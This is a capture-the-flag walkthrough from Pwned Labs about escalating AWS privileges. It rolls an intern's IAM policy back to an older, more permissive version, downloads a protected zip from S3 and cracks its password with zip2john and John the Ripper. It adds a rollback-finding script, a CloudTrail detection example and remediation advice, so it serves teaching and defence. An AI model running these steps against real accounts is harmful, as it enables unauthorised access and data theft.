# Escalate Privileges by IAM Policy Rollback

CTF Source: [Pwned Labs](https://pwnedlabs.io/labs/escalate-privileges-by-iam-policy-rollback)

## Overview

In this walkthrough, we're provided access keys for an intern with seemingly little access. An older, more permissive version of the intern's IAM policy is still stored in the account, and since we are allowed to change which version is the default, we can roll the policy back and reach sensitive data.

## Pre-Requisites

* Install awscli: `brew install awscli` (mac) `apt install awscli` (linux)
* Install JohnTheRipper, which also provides `zip2john`: `brew install john` (mac) `apt install john` (linux)

## Walkthrough

After configuring our AWS access keys (`aws configure`), let's begin to enumerate our access.

This command tells us who we are.

```
aws sts get-caller-identity

{
    "UserId": "AIDA4C7XGDAETYJA6EVGF",
    "Account": "831057696777",
    "Arn": "arn:aws:iam::831057696777:user/intern01"
}
```

We can then list policies attached to this user.

```
aws iam list-attached-user-policies --user-name intern01
{
    "AttachedPolicies": [
        {
            "PolicyName": "intern_policy",
            "PolicyArn": "arn:aws:iam::214768663777:policy/intern_policy"
        }
    ]
}
```

Let's see if we have multiple versions of this policy.

```
aws iam list-policy-versions --policy-arn arn:aws:iam::214768663777:policy/intern_policy

{
    "Versions": [
        {
            "VersionId": "v2",
            "IsDefaultVersion": true,
            "CreateDate": "2024-03-14T23:00:42+00:00"
        },
        {
            "VersionId": "v1",
            "IsDefaultVersion": false,
            "CreateDate": "2024-03-14T23:00:41+00:00"
        }
    ]
}
```

Both versions are readable with `aws iam get-policy-version --policy-arn <PolicyArn from list-attached-user-policies> --version-id v1` (or `v2`). The important one is `v1`, the non-default version.

```bash
aws iam get-policy-version --policy-arn arn:aws:iam::831057696777:policy/intern_policy --version-id v1

{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": [
                        "ec2:DescribeInstances",
                        "s3:ListAllMyBuckets",
                        "s3:GetObject",
                        "s3:ListBucket"
                    ],
                    "Effect": "Allow",
                    "Resource": "*"
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v1",
        "IsDefaultVersion": false,
        "CreateDate": "2024-03-14T21:43:51+00:00"
    }
}
```
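Reading two versions by eye works here, but a real user can have several attached policies, each with up to five stored versions. The following is an added example (not part of the lab or of the Pwned Labs material) that applies the same check to policy documents in the shape `get-policy-version` returns: for a given default version it reports whether the principal can call `iam:SetDefaultPolicyVersion` on the policy, and which actions a non-default version would add. `POLICY_V1` is copied from the output above; `POLICY_V2` is a constructed stand-in for the intern's default version, which this write-up does not print.

```python
"""Find IAM policy versions that would grant more access than the current default.

Added example; not from the original lab write-up. It works on the JSON that
`aws iam get-policy-version` returns, so it runs offline on the documents
embedded below. POLICY_V2 is a constructed guess at the intern's default
version (the write-up does not show it); POLICY_V1 is copied from the page.
"""
import fnmatch

POLICY_ARN = "arn:aws:iam::831057696777:policy/intern_policy"

# Copied from the write-up: the older, more permissive v1.
POLICY_V1 = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": ["ec2:DescribeInstances", "s3:ListAllMyBuckets",
                   "s3:GetObject", "s3:ListBucket"],
        "Resource": "*",
    }],
}

# Constructed (hypothetical) default v2: read-only IAM plus the one
# permission that makes the rollback possible.
POLICY_V2 = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["iam:Get*", "iam:List*"], "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:SetDefaultPolicyVersion",
         "Resource": POLICY_ARN},
        {"Effect": "Allow", "Action": "s3:ListAllMyBuckets", "Resource": "*"},
    ],
}


def _as_list(value):
    """IAM accepts a string or a list in Action/Resource; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _matches(patterns, value, fold=True):
    """IAM wildcards (* and ?) map onto fnmatch. Action names are
    case-insensitive (fold=True); ARNs are compared as written."""
    if fold:
        return any(fnmatch.fnmatchcase(value.lower(), p.lower()) for p in patterns)
    return any(fnmatch.fnmatchcase(value, p) for p in patterns)


def allows(doc, action, resource="*"):
    """True if `doc` allows `action` on `resource`; an explicit Deny wins.
    Conditions and NotAction/NotResource are not evaluated (simplification)."""
    allowed = False
    for stmt in _as_list(doc.get("Statement")):
        actions = _as_list(stmt.get("Action"))
        resources = _as_list(stmt.get("Resource"))
        if not (_matches(actions, action) and _matches(resources, resource, fold=False)):
            continue
        if stmt.get("Effect") == "Deny":
            return False
        allowed = True
    return allowed


def listed_actions(doc):
    """Every action literal appearing in an Allow statement, lower-cased."""
    out = set()
    for stmt in _as_list(doc.get("Statement")):
        if stmt.get("Effect") == "Allow":
            out.update(a.lower() for a in _as_list(stmt.get("Action")))
    return out


def gained_actions(default_doc, candidate_doc):
    """Actions the candidate version lists that the default does not allow on '*'."""
    return sorted(a for a in listed_actions(candidate_doc)
                  if not allows(default_doc, a))


def can_roll_back(default_doc, policy_arn):
    """Does the current default let the principal switch versions of this policy?"""
    return allows(default_doc, "iam:SetDefaultPolicyVersion", policy_arn)


if __name__ == "__main__":
    print("rollback possible:", can_roll_back(POLICY_V2, POLICY_ARN))
    print("v1 would add:", gained_actions(POLICY_V2, POLICY_V1))
```

To use it against a live account, feed `PolicyVersion.Document` from each `get-policy-version` call in as the dicts; a version that reports a non-empty `gained_actions` list while `can_roll_back` is true is a rollback target.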

### Escalating Privileges

The `v1` version grants S3 read permissions (`s3:GetObject`, `s3:ListBucket`) on every resource that the current default `v2` does not. IAM keeps old versions of a customer managed policy until someone deletes them, and switching the default takes effect immediately for every principal the policy is attached to. Our effective permissions evidently include `iam:SetDefaultPolicyVersion` on this policy (the next command succeeds), so we make `v1` the default again.

{% code overflow="wrap" %}

```bash
aws iam set-default-policy-version --policy-arn arn:aws:iam::831057696777:policy/intern_policy --version-id v1
```

{% endcode %}
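The call above leaves a trace: CloudTrail records every `SetDefaultPolicyVersion` call with the policy ARN and the chosen version in `requestParameters`, and a principal moving a policy it is itself attached to back to an older version is a strong signal. The following is an added detection example (not part of the lab write-up); the CloudTrail records are constructed to resemble what this lab's actions would produce, and the `INVENTORY` of current default versions and attachments is assumed to come from a prior `list-policy-versions` / `list-entities-for-policy` snapshot.

```python
"""Flag IAM policy-version rollbacks in CloudTrail.

Added example, not part of the lab write-up. EVENTS is a constructed set of
CloudTrail-shaped records (eventSource, eventName, userIdentity.arn,
requestParameters, errorCode); INVENTORY is an assumed snapshot of each
policy's current default version and attached principals.
"""
import copy

POLICY_ARN = "arn:aws:iam::831057696777:policy/intern_policy"
INTERN = "arn:aws:iam::831057696777:user/intern01"
ADMIN = "arn:aws:iam::831057696777:user/admin"

# Constructed records, in time order.
EVENTS = [
    {"eventTime": "2024-03-14T23:10:01Z", "eventSource": "iam.amazonaws.com",
     "eventName": "ListPolicyVersions", "userIdentity": {"arn": INTERN},
     "requestParameters": {"policyArn": POLICY_ARN}},
    # A denied attempt by someone else: logged, but nothing changed.
    {"eventTime": "2024-03-14T23:11:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "SetDefaultPolicyVersion", "userIdentity": {"arn": "arn:aws:iam::831057696777:user/auditor"},
     "requestParameters": {"policyArn": POLICY_ARN, "versionId": "v1"},
     "errorCode": "AccessDenied"},
    # The rollback from the walkthrough.
    {"eventTime": "2024-03-14T23:12:30Z", "eventSource": "iam.amazonaws.com",
     "eventName": "SetDefaultPolicyVersion", "userIdentity": {"arn": INTERN},
     "requestParameters": {"policyArn": POLICY_ARN, "versionId": "v1"}},
    # An admin restoring the newer version afterwards: forward, not a rollback.
    {"eventTime": "2024-03-15T08:00:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "SetDefaultPolicyVersion", "userIdentity": {"arn": ADMIN},
     "requestParameters": {"policyArn": POLICY_ARN, "versionId": "v2"}},
]

# Assumed snapshot taken before the events: default version and attachments.
INVENTORY = {
    POLICY_ARN: {"default": "v2", "attached_to": [INTERN]},
}


def version_number(version_id):
    """IAM version ids look like 'v1', 'v2', ...; return the integer part."""
    return int(version_id.lstrip("v"))


def find_rollbacks(events, inventory):
    """Return one alert per successful SetDefaultPolicyVersion that moves a
    policy to an older version than its current default. The inventory is
    updated as events are processed so later calls are judged against the
    then-current default."""
    state = copy.deepcopy(inventory)
    alerts = []
    for ev in events:
        if ev.get("eventSource") != "iam.amazonaws.com":
            continue
        if ev.get("eventName") != "SetDefaultPolicyVersion":
            continue
        if ev.get("errorCode"):
            continue  # denied or failed; the default did not change
        params = ev.get("requestParameters") or {}
        arn, new = params.get("policyArn"), params.get("versionId")
        info = state.get(arn)
        if info is None or new is None:
            continue  # unknown policy: no baseline to compare against
        actor = (ev.get("userIdentity") or {}).get("arn", "unknown")
        if version_number(new) < version_number(info["default"]):
            alerts.append({
                "time": ev.get("eventTime"),
                "actor": actor,
                "policy": arn,
                "from": info["default"],
                "to": new,
                # The actor is governed by the policy it just changed.
                "self_escalation": actor in info.get("attached_to", []),
            })
        info["default"] = new
    return alerts


if __name__ == "__main__":
    for alert in find_rollbacks(EVENTS, INVENTORY):
        print(alert)
```

The fix on the defender's side is to remove stale versions with `aws iam delete-policy-version` once a policy has been tightened, and to avoid granting `iam:SetDefaultPolicyVersion` (or `iam:CreatePolicyVersion`) to principals that are attached to the policy in question.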

With the permissive version active, listing buckets now works. We find one bucket and download the data.

{% code overflow="wrap" %}

```bash
aws s3 ls
2024-03-14 15:43:52 huge-logistics-data-8344bf3ad538
```

{% endcode %}

{% code overflow="wrap" %}

```bash
aws s3 cp s3://huge-logistics-data-8344bf3ad538/amex-export.zip .

download: s3://huge-logistics-data-8344bf3ad538/amex-export.zip to ./amex-export.zip
```

{% endcode %}

### Password Cracking

Unfortunately, the archive is password-protected.

{% code overflow="wrap" %}

```bash
unzip amex-export.zip 

Archive:  amex-export.zip
[amex-export.zip] amex-export.json password:   
```

{% endcode %}

Not to worry: we can try to crack the password. `zip2john` extracts a crackable hash from the archive; we save it to a file.

{% code overflow="wrap" %}

```bash
zip2john amex-export.zip > hash.txt
```

{% endcode %}

Next, we'll run JohnTheRipper against the hash with the classic rockyou.txt wordlist (on Kali it ships gzipped under `/usr/share/wordlists/`). If john has already cracked the hash in an earlier session, `john --show hash.txt` prints the result instead.

{% code overflow="wrap" %}

```bash
john hash.txt --wordlist=rockyou.txt

1logistics       (amex-export.zip)  
```

{% endcode %}

### Finding the Flag!

We found the password. Unzipping with it extracts both `amex-export.json` and a `flag.txt`.

{% code overflow="wrap" %}

```bash
unzip -P 1logistics amex-export.zip 

Archive:  amex-export.zip
  inflating: amex-export.json        
 extracting: flag.txt  
```

{% endcode %}

Get the final flag.

{% code overflow="wrap" %}

```bash
cat flag.txt      
  
<flagHash>
```

{% endcode %}

